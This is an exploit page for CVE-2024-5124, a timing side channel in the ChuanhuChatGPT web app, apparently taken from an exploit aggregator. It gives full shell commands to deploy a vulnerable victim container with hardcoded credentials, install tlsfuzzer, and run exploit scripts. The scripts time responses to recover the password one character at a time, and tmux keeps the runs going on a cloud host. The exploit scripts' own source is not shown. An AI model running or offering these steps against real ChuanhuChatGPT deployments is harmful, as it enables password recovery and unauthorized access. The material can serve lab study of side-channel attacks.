Exploit for Observable Discrepancy in Gaizhenbiao Chuanhuchatgpt CVE-2024-5124

Name: Exploit for Observable Discrepancy in Gaizhenbiao Chuanhuchatgpt CVE-2024-5124
Rating: 5 (554 reviews)
2024-10-30 | CVSS 7.5
## https://sploitus.com/exploit?id=E6DB5503-2C6E-5968-B5F5-022667277885
# deploy victim server:

# Install docker

```bash
# Install packages required for the installation

sudo apt-get update
sudo apt install --yes ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:

echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
# Download GPG key and store repository in the system

curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null 
apt update 

# Install Docker packages

sudo apt install --yes docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
```

# Run victim server

```bash
export JSON='{
    "users": [["openai", "isCloseAi"]]
}' ; sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"
```


# deploy exploit:

# I Install tlsfuzzer

```bash
sudo apt install --yes virtualenv
virtualenv -p python3 venv3
source venv3/bin/activate
pip install --pre tlslite-ng
git clone https://github.com/tlsfuzzer/tlsfuzzer

pip install requests argparse
```

# II Run exploit

The argument `--clock-frequency` always must be set to `1000` like for example `--clock-frequency 1000`. No need to Guess your clock with: `watch -n 1 "cat /proc/cpuinfo | grep 'MHz'"` in python.

lowercase:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

uppercase:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```


full:

```bash
rm -r tmpdir/ && mkdir tmpdir/ ;
python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z "out.csv" &&
PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -c A -c B -c D -c E -c F -c G -c H -c I -c J -c K -c L -c M -c N -c O -c P -c Q -c R -c S -c T -c U -c V -c W -c X -c Y -c Z -o ./tmpdir/ &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv &&
PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose
```

Then the guessed character will be the one with the toppest (hightest) value in the file ./tmpdir/box_plot.png


You could also run the script on a cloud instance in this case, you could do :

```bash 
export JSON='{
    "users": [["openai", "isCloseAi"]]
}' ;

export DOCKER_CMD="apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"

export DOCKER_RUN='sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "${DOCKER_CMD}"'

tmux new-session -d -s persistent_server "${DOCKER_RUN}"
tmux attach -t persistent_server

# read the server url and edit the main.py to change the main.oy


tmux new-session -d -s persistent_session "rm -Rf tmpdir/ ; mkdir tmpdir/ ; python3 CVE-2024-5124/main.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z 'out.csv' && PYTHONPATH=tlsfuzzer ./tlsfuzz-venv/bin/python ./CVE-2024-5124/step2like.py -r 10000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z -o ./tmpdir/ && PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/extract.py --raw-times out.csv -o ./tmpdir/ --clock-frequency 1000 -l ./tmpdir/log.csv && PYTHONPATH=tlsfuzzer tlsfuzz-venv/bin/python3 tlsfuzzer/tlsfuzzer/analysis.py -o tmpdir/ --verbose"
tmux attach -t persistent_session
```

and reopen it at any moment with `tmux attach -t persistent_session`. It is `ctr-b` then `d` to detach it back.